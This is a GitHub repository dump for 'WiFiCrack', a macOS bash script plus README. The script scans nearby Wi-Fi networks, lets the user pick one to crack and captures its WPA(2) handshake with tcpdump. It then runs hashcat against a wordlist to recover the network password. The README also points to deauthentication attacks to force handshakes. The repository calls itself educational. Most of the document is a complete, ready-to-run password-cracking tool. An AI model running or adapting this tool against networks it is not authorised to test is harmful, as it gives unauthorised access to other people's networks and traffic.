├── LICENSE ├── README.md └── WiFiCrack.sh /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 phenotypic 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WiFiCrack 2 | 3 | #### This repository is not actively maintained. See [WiFiCrackPy](https://github.com/phenotypic/WiFiCrackPy) for an updated version of this project. 4 | 5 | WiFiCrack demonstrates of some of the security flaws associated with WPA(2) networks by demonstrating simple and efficient cracking. It captures the necessary Wi-Fi packets associated with with WPA(2) handshakes and then utilises [hashcat](https://github.com/hashcat/hashcat) to attempt to extract the hashed passkey. The script is for educational purposes and should not be misused. 6 | 7 | ## Prerequisites 8 | 9 | You must have [Xcode](https://itunes.apple.com/us/app/xcode/id497799835?l=en&mt=12) installed. You will need to install any other outstanding requirements: 10 | 11 | | Command | Installation | 12 | | --- | --- | 13 | | `hashcat` | Manual installation: install via [brew](https://brew.sh) by running `brew install hashcat`| 14 | | `mergecap` | Manual installation: comes with the [Wireshark](https://www.wireshark.org) application (v2.6.12) | 15 | | `./hashcat-utils/src/cap2hccapx.bin` | Automatic installation option when script is run | 16 | 17 | **Note:** You will also need to supply a word list for hashcat 18 | 19 | **Note:** The script has been successfully tested with macOS Catlaina when using the `bash` shell. `zsh` may cause some problems 20 | 21 | ## Usage 22 | 23 | Download with: 24 | ``` 25 | git clone https://github.com/phenotypic/WiFiCrack.git 26 | ``` 27 | 28 | Run from same directory with: 29 | ``` 30 | bash WiFiCrack.sh 31 | ``` 32 | 33 | The script is fairly easy to use, simply run it using the command above and enter your `sudo` password when prompted. Here are some flags you can add: 34 | 35 | | Flag | Description | 36 | | --- | --- | 37 | | `-h` | Help: Display all available flags | 38 | | `-k` | Keep: Keep all captured packet files (deleted at end of session by default) | 39 | | `-a` | Alert: Turn off successful crack alert | 40 | | `-w ` | Wordlist: Manually define a wordlist path (the script will prompt you otherwise) | 41 | | `-i ` | Interface: Manually set Wi-Fi interface (script should normally auto-detect the correct interface) | 42 | | `-d ` | Device: Manually define 'devices' for hashcat | 43 | 44 | After running the script, you will be asked to choose a network to crack. 45 | 46 | Following the selection of a network, you may have to wait for a while until a handshake occurs on the target network (i.e. for a device to (re)connect to the network), but this can be hastened by performing a [deauthentication attack](https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack). 47 | 48 | Once a handshake is captured, WiFiCrack will initialise `hashcat` to extract the Wi-Fi password. This step may take a while depending on a number of factors including your processing power. If successful you will be presented with the password, otherwise, WiFiCrack will retain the handshake in its directory if you would like to perform another type of attack against the capture. 49 | 50 | ## To-do list 51 | 52 | - [ ] Integrate deauthentication attack into main script 53 | - [ ] Provide more `hashcat` attack options (e.g. brute force) 54 | -------------------------------------------------------------------------------- /WiFiCrack.sh: -------------------------------------------------------------------------------- 1 | #! /bin/bash 2 | 3 | cap2hccapxlocation="/hashcat-utils/src/cap2hccapx.bin" 4 | 5 | GREEN='\033[0;32m' 6 | GREENT='\033[1;32m' 7 | RED='\033[0;31m' 8 | REDT='\033[1;31m' 9 | BLUE='\033[0;34m' 10 | BLUET='\033[1;34m' 11 | LINK='\033[0;34;4m' 12 | PURPLE='\033[0;35m' 13 | DARKGRAY='\033[1;30m' 14 | DUN='\033[1;30;4m' 15 | ORANGEBROWN='\033[0;33m' 16 | NC='\033[0m' 17 | 18 | ostype="$( uname -s )" 19 | COLUMNS=$(tput cols) 20 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null && pwd )" 21 | 22 | if [ "$ostype" != "Darwin" ]; then 23 | printf "${REDT}[!] ${NC}ERROR: This script is only designed for macOS.\n" 24 | exit 25 | fi 26 | 27 | TERMINALCOLOUR="$( defaults read -g AppleInterfaceStyle 2>/dev/null )" 28 | if [[ "$TERMINALCOLOUR" == *"Dark"* ]]; then 29 | DARKGRAY='\033[1;37m' 30 | DUN='\033[1;37;4m' 31 | else 32 | DARKGRAY='\033[1;30m' 33 | DUN='\033[1;30;4m' 34 | fi 35 | 36 | printf "${NC}" 37 | 38 | clear 39 | cat << "EOF" 40 | 41 | __ ___ ______ _ _____ _ 42 | \ \ / (_) ____(_)/ ____| | | 43 | \ \ /\ / / _| |__ _| | _ __ __ _ ___| | __ 44 | \ \/ \/ / | | __| | | | | '__/ _` |/ __| |/ / 45 | \ /\ / | | | | | |____| | | (_| | (__| < 46 | \/ \/ |_|_| |_|\_____|_| \__,_|\___|_|\_\ 47 | 48 | 49 | EOF 50 | 51 | cd ~/ 52 | 53 | if [[ "$@" == *"-h"* ]]; then 54 | echo "Help:" 55 | printf " ${DARKGRAY}-h ${NC}| Show this text\n" 56 | printf " ${DARKGRAY}-k ${NC}| Keep all captured packet files\n" 57 | printf " ${DARKGRAY}-a ${NC}| Turn off successfull crack alert\n" 58 | printf " ${DARKGRAY}-w ${NC}| Manually define path to wordlist\n" 59 | printf " ${DARKGRAY}-i ${NC}| Manually define a Wi-Fi interface\n" 60 | printf " ${DARKGRAY}-d ${NC}| Manually define devices for hashcat\n" 61 | echo 62 | exit 63 | fi 64 | 65 | if ! [ -x "$(command -v mergecap)" ]; then 66 | printf "${REDT}[!] ${NC}ERROR: Cannot execute ${DARKGRAY}mergecap${NC}." 67 | printf "\n${GREENT}[+] ${NC}" 68 | read -p "Would you like to install Wireshark? (y/n): " ifoutput 69 | if [ "$ifoutput" == "y" ] || [ "$ifoutput" == "Y" ]; then 70 | open https://www.wireshark.org/download.html 71 | exit 72 | else 73 | printf "${BLUET}[*] ${NC}To manually install, go to: ${LINK}https://www.wireshark.org/download.html${NC}\n" 74 | exit 75 | fi 76 | fi 77 | 78 | if ! [ -x "$(command -v .$cap2hccapxlocation)" ]; then 79 | printf "${REDT}[!] ${NC}ERROR: Cannot execute ${DARKGRAY}hashcat-utils${NC}." 80 | printf "\n${GREENT}[+] ${NC}" 81 | read -p "Would you like to install hascat-utils now? (y/n): " ifoutput 82 | if [ "$ifoutput" == "y" ] || [ "$ifoutput" == "Y" ]; then 83 | cd ~/ 84 | git clone https://github.com/hashcat/hashcat-utils.git 85 | cd ~/hashcat-utils/src && make 86 | cd ~/ 87 | if ! [ -x "$(command -v .$cap2hccapxlocation)" ]; then 88 | printf "\n${REDT}[!] ${NC}ERROR: Still cannot execute ${DARKGRAY}hashcat-utils${NC}.\n\n" 89 | exit 90 | else 91 | printf "\n${BLUET}[*] ${NC}Finished installing ${DARKGRAY}hashcat-utils${NC}.\n\n" 92 | fi 93 | else 94 | printf "${BLUET}[*] ${NC}To manually install, git-clone the \"hashcat-utils\" repository and run \`make\`\n" 95 | exit 96 | fi 97 | fi 98 | 99 | if ! [ -x "$(command -v hashcat)" ]; then 100 | printf "${REDT}[!] ${NC}ERROR: Cannot execute ${DARKGRAY}hashcat${NC}." 101 | printf "${BLUET}[*] ${NC}To install hashcat, first install brew from: ${LINK}https://www.wireshark.org/download.html${NC}, then run \`brew install hashcat\`\n" 102 | fi 103 | 104 | sudo -v 105 | 106 | cd ~/ 107 | 108 | if [[ "$@" == *"-i"* ]]; then 109 | wifiinterfacename="$( echo "$@" | sed -n -e 's/^.*-i //p' | cut -d\ -f1 )" 110 | else 111 | wifiinterfacename="$( networksetup -listallhardwareports | awk '/Hardware Port: Wi-Fi/{getline; print $2}' )" 112 | fi 113 | 114 | if [[ "$@" == *"-d"* ]]; then 115 | hashdevice="$( echo "$@" | sed -n -e 's/^.*-d //p' | cut -d\ -f1 )" 116 | fi 117 | 118 | if [[ "$@" == *"-w"* ]]; then 119 | wordlist="$( echo "$@" | sed -n -e "s/^.*-w //p" | sed 's/ -.*//' )" 120 | askwordlist="0" 121 | if [ ! -f $wordlist ]; then 122 | askwordlist="1" 123 | fi 124 | else 125 | askwordlist="1" 126 | fi 127 | 128 | sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -z 129 | 130 | printf "${BLUET}[*] ${NC}Scanning for Wi-Fi networks...\n" 131 | 132 | count=1 133 | while read line ; do 134 | 135 | if [ "$count" == "1" ]; then 136 | clear 137 | printf "${DUN}%-6s${NC} %-1s ${DUN}%-4s${NC} %-22s ${DUN}%-5s${NC} %-15s ${DUN}%-6s${NC} %-2s ${DUN}%-7s${NC}" "Number" "" "Name" "" "BSSID" "" "Signal" "" "Channel" 138 | fi 139 | 140 | mad="$( echo "$line" | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}' )" 141 | mad="$( echo ${mad//[[:blank:]]/} )" 142 | net="$( echo "$line" | sed "s/ *$mad.*//" )" 143 | sig="$( echo "$line" | sed -n -e "s/^.*$mad //p" | sed 's/ .*//' )" 144 | chan="$( echo "$line" | sed -n -e "s/^.*$sig //p" | sed 's/ .*//' | sed 's/,.*//' )" 145 | 146 | if [ "$sig" -ge "-60" ]; then 147 | COLOR=$GREEN 148 | elif [ "$sig" -ge "-80" ]; then 149 | COLOR=$ORANGEBROWN 150 | else 151 | COLOR=$RED 152 | fi 153 | 154 | if [ "$chan" -ge "36" ]; then 155 | CHANCOLOR=$PURPLE 156 | else 157 | CHANCOLOR=$NC 158 | fi 159 | 160 | ONLYASCII="$( echo "$net" | perl -pe 's/[^[:ascii:]]//g' )" 161 | difference=$((${#net} - ${#ONLYASCII})) 162 | size=$((${difference}*2 + 27)) 163 | 164 | printf "\n\n${DARKGRAY}%-8s${NC} %-${size}s %-21s ${COLOR}%-9s${NC} ${CHANCOLOR}%-8s${NC}" "[$count]" "$net" "$mad" "$sig" "$chan" 165 | 166 | scan="$scan 167 | $net~$mad~$sig~$chan" 168 | 169 | count=$(($count + 1)) 170 | done < <(sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | tail -n +2 | sort) 171 | count=$(($count - 1)) 172 | 173 | if [ "$count" == "0" ]; then 174 | printf "${REDT}[!] ${NC}ERROR (airport failure): Please run WiFiCrack again...\n" 175 | exit 176 | fi 177 | 178 | scan="$( echo "$scan" | sed '/^\s*$/d' )" 179 | 180 | printf "\n\n${GREENT}[+] ${NC}" 181 | read -p "Select a network to crack (1-$count): " numberchoice 182 | if [[ ! $numberchoice =~ ^[0-9]+$ ]] || [ "$numberchoice" == "0" ] || (( $numberchoice > $count )); then 183 | printf "${REDT}[!] ${NC}ERROR: Invalid input...\n" 184 | exit 185 | fi 186 | overall="$( echo "$scan" | awk "FNR==$numberchoice" )" 187 | targetnet="$( echo "$overall" | sed 's/~.*//' )" 188 | targetmac="$( echo "$overall" | sed -n -e "s/^.*$targetnet~//p" | sed 's/~.*//' )" 189 | sig="$( echo "$overall" | sed -n -e "s/^.*$targetmac~//p" | sed 's/~.*//' )" 190 | targetchan="$( echo "$overall" | sed -n -e "s/^.*$sig~//p" )" 191 | printf "${BLUET}[*] ${NC}Target network set to: ${DARKGRAY}$targetnet${NC} ($targetmac)" 192 | 193 | if [ "$askwordlist" == "1" ]; then 194 | printf "\n\n${GREENT}[+] ${NC}" 195 | read -p "Enter full path to your wordlist: " wordlist 196 | if [ ! -f $wordlist ]; then 197 | printf "${REDT}[!] ${NC}ERROR: File not found!\n" 198 | exit 199 | else 200 | printf "${BLUET}[*] ${NC}Wordlist set to: ${DARKGRAY}$wordlist${NC}" 201 | fi 202 | fi 203 | 204 | clear 205 | 206 | convertsecs() { 207 | ((h=${1}/3600)) 208 | ((m=(${1}%3600)/60)) 209 | ((s=${1}%60)) 210 | printf "%02d:%02d:%02d\n" $h $m $s 211 | } 212 | 213 | if [[ "$@" != *"-k"* ]]; then 214 | function finish { 215 | sudo rm -rf $DIR/beacon.cap && sudo rm -rf $DIR/handshake.cap && sudo rm -rf $DIR/capture.cap && sudo rm -rf $DIR/capture.hccapx 216 | } 217 | trap finish EXIT 218 | fi 219 | 220 | start=$SECONDS 221 | DATE="$( date +"%T" )" 222 | echo 223 | echo "Scan started: $DATE" | fmt -c -w $COLUMNS 224 | 225 | total=$((${#targetnet} + 16)) 226 | leftover=$(($COLUMNS - $total)) 227 | y=2 228 | eitherside="$( echo $((leftover / y)) )" 229 | eitherside2=$(($eitherside - 1)) 230 | printf "%-${eitherside}s %-13s ${DARKGRAY}%-${#targetnet}s${NC} %-${eitherside2}s" "" "Target network:" "$targetnet" "" 231 | 232 | echo 233 | echo "Waiting for a WPA handshake. This might take a while..." | fmt -c -w $COLUMNS 234 | echo 235 | echo "--------------------------------------------------------------------------------" 236 | echo 237 | 238 | cd ~/ 239 | 240 | sudo -v 241 | 242 | sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -z 243 | sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -c$targetchan 244 | sudo tcpdump "type mgt subtype beacon and ether src $targetmac" -I -c 1 -i $wifiinterfacename -w $DIR/beacon.cap &>/dev/null 245 | printf "${BLUET}[*] ${NC}Captured beacon frame, waiting for handshake...\n\n" 246 | 247 | sudo tcpdump "ether proto 0x888e and ether host $targetmac" -I -U -vvv -i $wifiinterfacename -w $DIR/handshake.cap &>/dev/null & 248 | PROC_ID=$! 249 | 250 | commandnumber=0 251 | 252 | while [ "$commandnumber" -lt "1" ] || [ "$commandoutput" != "Written" ]; do 253 | sudo mergecap -a -F pcap -w $DIR/capture.cap $DIR/beacon.cap $DIR/handshake.cap &>/dev/null 254 | command=`sudo .$cap2hccapxlocation $DIR/capture.cap $DIR/capture.hccapx "$targetnet" 2>/dev/null` 255 | 256 | commandoutput="$( echo "$command" | tail -1 | awk '{print $1;}' )" 257 | commandnumber="$( echo "$command" | tail -1 | grep -o -E '[0-9]+' | head -1 | sed -e 's/^0\+//' )" 258 | if [ -z "$commandnumber" ]; then 259 | commandnumber=0 260 | fi 261 | sleep 1 262 | done 263 | 264 | echo "$command" 265 | 266 | if [[ "$@" != *"-k"* ]]; then 267 | sudo rm -r $DIR/beacon.cap && sudo rm -r $DIR/handshake.cap && sudo rm -r $DIR/capture.cap 268 | fi 269 | 270 | sudo kill $PROC_ID 271 | 272 | DATE="$( date +"%T" )" 273 | duration=$(( SECONDS - start )) 274 | echo 275 | echo "--------------------------------------------------------------------------------" 276 | echo 277 | echo "Scan finished, captured $commandnumber handshakes!" | fmt -c -w $COLUMNS 278 | 279 | duration="$( echo $(convertsecs $duration) )" 280 | 281 | echo "Time ended: $DATE ($duration)" | fmt -c -w $COLUMNS 282 | echo 283 | 284 | sleep 3 285 | 286 | if [[ "$@" != *"-k"* ]]; then 287 | function finish { 288 | amiaplaceholder="yes" 289 | } 290 | fi 291 | 292 | clear 293 | printf "\n${BLUET}[*] ${NC}Starting hashcat in...\n" 294 | sleep 1 && printf "\n3" 295 | echo 296 | sleep 1 && printf "\n2" 297 | echo 298 | sleep 1 && printf "\n1" 299 | sleep 1 300 | clear 301 | 302 | cd ~/ 303 | 304 | if [ -z "$hashdevice" ]; then 305 | cracker="$( hashcat -m 2500 $DIR/capture.hccapx $wordlist | tee /dev/tty | sed -e "/:$targetnet:/q" )" 306 | else 307 | cracker="$( hashcat -d $hashdevice -m 2500 $DIR/capture.hccapx $wordlist | tee /dev/tty | sed -e "/:$targetnet:/q" )" 308 | fi 309 | 310 | clear 311 | 312 | pass="$( echo "$cracker" | grep ":$targetnet:" | tail -1 | sed -n -e "s/^.*$targetnet://p" )" 313 | 314 | if [ -z "$pass" ]; then 315 | echo 316 | printf "${REDT}" 317 | echo "WiFiCrack failed..." | fmt -c -w $COLUMNS 318 | printf "${NC}" 319 | echo 320 | echo "Kept handshake, crack manually with:" | fmt -c -w $COLUMNS 321 | printf "${DARKGRAY}" 322 | if [ -z "$hashdevice" ]; then 323 | echo "hashcat -m 2500 $DIR/capture.hccapx $wordlist" | fmt -c -w $COLUMNS 324 | else 325 | echo "hashcat -d $hashdevice -m 2500 $DIR/capture.hccapx $wordlist" | fmt -c -w $COLUMNS 326 | fi 327 | printf "${NC}" 328 | echo 329 | else 330 | if [[ "$@" != *"-k"* ]]; then 331 | sudo rm -r $DIR/capture.hccapx 332 | fi 333 | echo 334 | printf "${GREENT}" 335 | echo "WiFiCrack succeeded!" | fmt -c -w $COLUMNS 336 | printf "${NC}" 337 | echo 338 | echo "Password for \"$targetnet\":" | fmt -c -w $COLUMNS 339 | printf "${DARKGRAY}" 340 | echo "$pass" | fmt -c -w $COLUMNS 341 | printf "${NC}" 342 | echo 343 | if [[ "$@" != *"-a"* ]]; then 344 | osascript -e 'display notification "Password for '"$targetnet"': '"$pass"'" with title "WiFiCrack"' 345 | fi 346 | fi 347 | --------------------------------------------------------------------------------